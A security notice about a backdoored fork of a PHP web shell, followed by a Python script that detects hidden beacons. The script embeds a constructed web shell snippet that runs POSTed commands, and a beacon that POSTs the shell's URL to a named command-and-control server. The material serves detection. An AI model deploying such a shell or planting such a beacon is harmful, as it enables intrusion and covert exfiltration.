Description
Hi,
This repository is a copy of my original project:
https://github.com/0xP1ckl3d/p1ckled_web_shell
The code here has been modified from my original to include a malicious backdoor.
Specifically, it sends the URL location of all deployed web shells to a command-and-control server via:
POST https://r00t-shell.com/logs/log.php
Anyone who has deployed one of these modified web shells should be aware that the threat actor behind this repository now knows the location of the shell and has likely used that information to upload additional malicious payloads to the compromised systems.
The group responsible appears to be based in Russia. They are not particularly sophisticated — I was able to compromise their infrastructure and recover a full list of affected URLs (approx. 600 hosts).
This is a clear example of a supply chain attack. Please ensure you fully understand the source and behaviour of any code before using it, particularly in client environments.
Stay safe,
0xP1ckl3d
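
A source audit for the beacon described in the notice above (a POST of each deployed shell's own URL to the C2), as an added example that is not part of the original notice and not code from the p1ckled_web_shell project. It assumes the shell is PHP. The two PHP snippets inside are constructed stand-ins for the clean upstream and the backdoored fork, not the real files; the only detail taken from the notice is the C2 URL.

```python
"""Audit a third-party web shell for a hidden beacon before deploying it.

Added example; not code from the original notice or from p1ckled_web_shell.
The two PHP snippets are constructed stand-ins for the upstream shell and the
backdoored fork; the only detail taken from the notice is the C2 URL.
"""
import difflib
import os
import re
from urllib.parse import urlparse

UPSTREAM_PHP = r"""<?php
// constructed stand-in for the clean upstream shell: no outbound traffic
if (isset($_POST['cmd'])) {
    echo '<pre>' . htmlspecialchars(shell_exec($_POST['cmd'])) . '</pre>';
}
"""

FORK_PHP = r"""<?php
// constructed stand-in for the fork: same shell plus a beacon that POSTs
// the shell's own URL to the C2 named in the notice
$u = 'http' . (empty($_SERVER['HTTPS']) ? '' : 's') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$ctx = stream_context_create(['http' => ['method' => 'POST', 'content' => http_build_query(['url' => $u])]]);
@file_get_contents('https://r00t-shell.com/logs/log.php', false, $ctx);
if (isset($_POST['cmd'])) {
    echo '<pre>' . htmlspecialchars(shell_exec($_POST['cmd'])) . '</pre>';
}
"""

# PHP calls that can open an outbound connection. A shell dropped on a client
# box has no business phoning anywhere, so every hit is a lead to read.
NETWORK_SINKS = ("curl_init", "curl_exec", "file_get_contents", "fopen",
                 "fsockopen", "pfsockopen", "stream_socket_client")
SINK_RE = re.compile(r"\b(" + "|".join(NETWORK_SINKS) + r")\s*\(")
URL_RE = re.compile(r"""['"](https?://[^'"\s]+)['"]""")


def find_beacons(php_source, allowed_hosts=()):
    """Return {"sinks": [(line, name)], "urls": [(line, url)]} for the source.

    A hard-coded URL is reported unless its host is in allowed_hosts. A file
    that has both an unexpected URL and a network sink is what a beacon looks
    like, whether or not the two sit on the same line.
    """
    sinks, urls = [], []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        sinks += [(lineno, m.group(1)) for m in SINK_RE.finditer(line)]
        for url in URL_RE.findall(line):
            if urlparse(url).hostname not in allowed_hosts:
                urls.append((lineno, url))
    return {"sinks": sinks, "urls": urls}


def has_beacon(php_source, allowed_hosts=()):
    """True when the source both names an unexpected URL and can reach the network."""
    found = find_beacons(php_source, allowed_hosts)
    return bool(found["sinks"]) and bool(found["urls"])


def injected_lines(upstream, fork):
    """Lines present in the fork but not upstream: the '+' side of a zero-context diff."""
    lines = list(difflib.unified_diff(upstream.splitlines(), fork.splitlines(),
                                      lineterm="", n=0))
    # lines[0:2] are the '---' / '+++' file headers, not content
    return [l[1:] for l in lines[2:] if l.startswith("+")]


def scan_tree(root, allowed_hosts=()):
    """Walk a web root and list PHP files that look like they beacon out."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml", ".php5")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as f:
                    if has_beacon(f.read(), allowed_hosts):
                        hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    print("upstream beacons:", has_beacon(UPSTREAM_PHP))
    print("fork beacons:", has_beacon(FORK_PHP))
    for line in injected_lines(UPSTREAM_PHP, FORK_PHP):
        print("injected:", line)
```

The scanner only catches URLs written as literals; a host passed to fsockopen without a scheme, or a URL assembled by concatenation or decoded from base64 at runtime, slips past it, which is why the diff against the upstream copy is the more reliable check when an upstream exists. For shells already deployed, the same domain can be looked for in DNS and egress proxy logs.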